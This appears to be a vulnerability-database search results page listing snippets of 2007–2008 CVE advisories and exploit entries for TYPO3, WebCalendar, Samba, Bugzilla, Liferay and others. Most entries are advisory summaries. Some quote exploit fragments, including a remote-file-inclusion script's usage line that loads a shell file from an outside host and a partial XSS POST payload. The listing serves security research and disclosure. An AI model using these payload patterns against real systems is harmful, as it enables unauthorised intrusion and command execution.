2661 matches found
CVE-2008-3028
Multiple cross-site scripting (XSS) vulnerabilities in the Send-A-Card (sr_sendcard) extension 2.2.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors...
CVE-2008-3028
CVE-2008-3028 affects the TYPO3 Send-A-Card extension (sr_sendcard) 2.2.2 and earlier. The vulnerability is multiple cross-site scripting (XSS) flaws that allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. The documents identify TYPO3 extension as the affected ...
WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability ================================================================== WebCalendar v1.0.4 Remote File Include...
GreaseKit and Creammonkey allows execution of userscript functions
Overview: GreaseKit and Creammonkey contain a vulnerability that can be exploited to execute functions for userscripts. GreaseKit and Creammonkey are plugins that enable user scripting in Safari and other Apple WebKit applications, and they provide APIs callable only from userscripts. GreaseKit a...
PT-2008-3409 · Xine · Xine-Lib
Name of the Vulnerable Software and Affected Versions: xine-lib versions 1.1.12 and earlier Description: The issue is a stack-based buffer overflow in the demux_nsf_send_chunk function, located in src/demuxers/demux_nsf.c. This allows remote attackers to cause a denial of service, potentially...
PT-2008-3244 · Autonomy · Worksite Web
Name of the Vulnerable Software and Affected Versions: WorkSite Web versions 8.2 before SP1 P2 Description: The issue allows remote attackers to cause a denial of service, specifically memory consumption, via a large number of SendNrlLink directives. This results in opening a separate window for...
Buffer overflow in CIFS VFS
Multiple buffer overflows in CIFS VFS in Linux kernel 2.6.23 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long SMB responses that trigger the overflows in the SendReceive function...
DEBIAN-CVE-2007-6015
Stack-based buffer overflow in the send_mailslot function in nmbd in Samba 3.0.0 through 3.0.27a, when the "domain logons" option is enabled, allows remote attackers to execute arbitrary code via a GETDC mailslot request composed of a long GETDC string following an offset username in a SAMLOGON...
CVE-2007-6173
Cross-site scripting (XSS) vulnerability in c/portal/login in Liferay Enterprise Portal 4.3.1 allows remote attackers to inject arbitrary web script or HTML via the emailAddress parameter in a Send New Password action, a different vector than CVE-2007-6055. NOTE: some of these details are obtained...
liferay-xss.txt
Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo: http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...
GLSA-200709-18 : Bugzilla: Multiple vulnerabilities
The remote host is affected by the vulnerability described in GLSA-200709-18 (Bugzilla: Multiple vulnerabilities). Masahiro Yamada found that from the 2.17.1 version, Bugzilla does not properly sanitize the content of the 'buildid' parameter when filing bugs (CVE-2007-4543). The next two vulnerabiliti...
sharelor-xss.txt
Sharelor file sender Cross site scripting ========================================= POST variable : http://www.fileflasher.com:80/contact.php?action=send with line below from="alert1248191921%3B malibu.r...
Directory traversal
Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. (dot dot) in a Send request, probably related to the (1) Send and (2) Exchange services...
CVE-2007-4220
Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. (dot dot) in a Send request, probably related to the (1) Send and (2) Exchange services...
CVE-2007-4538
emailin.pl in Bugzilla 2.23.4 through 3.0.0 allows remote attackers to execute arbitrary commands via the -f (From address) option to the Email::Send::Sendmail function, probably involving shell metacharacters...
mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...
phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities
!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc Delete Config Value Rude Attack - can't do anything after 2 - Send an Email to all of the subscribers Do not alter anything Related: 1 - None 2 - OneWordTitle TextOfYourChoice Es: php ".$argv0."...
0irc-client v1345 build20060823 Denial of Service Exploit
Exploit for unknown platform in category dos / poc ========================================================= 0irc-client v1345 build20060823 Denial of Service Exploit ========================================================= / 0irc-client v1345 build 20060823 DoS Exploit By DiGitalX email protect...